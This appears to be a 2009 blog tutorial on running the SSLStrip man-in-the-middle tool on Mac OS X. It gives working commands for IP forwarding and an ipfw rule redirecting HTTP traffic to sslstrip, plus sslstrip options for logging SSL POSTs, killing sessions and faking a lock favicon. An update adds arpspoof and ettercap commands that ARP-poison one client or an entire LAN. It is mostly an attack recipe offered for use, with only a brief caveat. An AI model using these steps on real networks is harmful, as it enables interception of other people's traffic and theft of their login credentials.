Monday, May 4, 2009

SSL Strip on Mac OS X

After playing around with SSL Strip for a while on BackTrack 4, I decided on trying to get it up and running on my MacBook. It turns out it was actually quite easy!

First thing, is to download the SSL Strip package from Moxie Marlinspike's homepage. You can grab it from the link above.

Next, if you're using MacPorts Python 2.5, like I am, you'll need to:

sudo port install py25-socket-ssl

The MacPorts Python 2.5 port maintainer decided to split the ssl sockets modules up into a different package for some reason, so you'll need to add it as shown.

Now, you'll need to make sure your Mac is configured to do ip forwarding and make sure that the ip firewall is enabled. Use the following commands to do so:

sysctl net.inet.ip.forwarding
sysctl net.inet.ip.fw.enable


If either of those are diabled, set them like so:

sudo sysctl -w net.inet.ip.forwarding=1
sudo sysctl -w net.inet.ip.fw.enable=1


Now, your system should be set for ip forwarding and applying firewall rules.

The firewall rules can now be modified to forward all port 80 traffic to the port which SSL Strip will listen on. If you want to listen on 1234, for example, the following ipfw command will set you up:

ipfw add fwd 127.0.0.1,1234 tcp from not me to any 80

The add fwd 127.0.0.1,1234 part tells ipfw to add a new rule for forwarding traffic to 127.0.0.1 on port 1234. The rest of the command is the logic which will be used to match the traffic which needs to be forwarded. The tcp obviously specifies that it will match on only TCP traffic. from not me to any makes it so that it will match any traffic which is being sent from any address other than your IP to any other IP address. If you instead use any to any I found that SSL Strip's traffic will get redirected to itself, which will cause problems. Finally, the 80 specifies that only TCP traffic destined for the HTTP port will be forwarded.

Finally, with that rule set up, all that needs to be done is to run SSL Strip.python sslstrip.py -h shows the following options:

sslstrip 0.2 by Moxie Marlinspike
Usage: sslstrip

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.


So, the basic python sslstrip.py -l 1234 should get you started.

The kill session and favicon options are handy, so those are worth checking out. Also, the -a option is handy if you need to debug things or just want a dump of all traffic which is running through the proxy.

I think that's about it for all the configuring. Running and parsing the results of SSL Strip is something I'm sure you all can figure out.

Let me know if any of the above steps don't work for you. Otherwise, happy hacking, don't do anything mean and as usual, have fun!


Update 05/18/2009 -
After seeing Ivan's question, I realized I didn't provide anything on how to convince people to connect through you instead of the default gateway. Oops! Well, here's the rest:

I used arpspoof when setting up sslstrip for the first time because I'm more used to it and I also find it easier to target individual clients. Also, I think it reduces my chances of breaking connectivity on the entire LAN if my ipfw config was off.

So, what I did in my initial testing was:

arpspoof -i en1 -t 192.168.1.101 192.168.1.1

Where en1 is my Mac's AirPort adapter, 192.168.1.101 is the client I'm attempting to MITM and 192.168.1.1 is the address I'm spoofing which is the default gateway for my LAN.

I didn't use ettercap with sslstrip, but if I remember my ettercap correctly, you can use it to attack an entire LAN like so:

ettercap -i en1 -Tq -M arp /192.168.1.1/ // -P autoadd

In this example, -Tq enables just the console interface in quiet mode, -M arp instructs ettercap to use ARP poisoning for doing the MITM, /192.168.1.1/ // instructs it to poison all connections between the gateway and any other hosts on the LAN. Finally, the -P autoadd enables the autoadd plugin so that new hosts are poisoned upon connecting to the LAN. You may need to use -M arp:remote which enables ettercap to sniff remote connections, but I think you'll be fine without.

Hope this helps!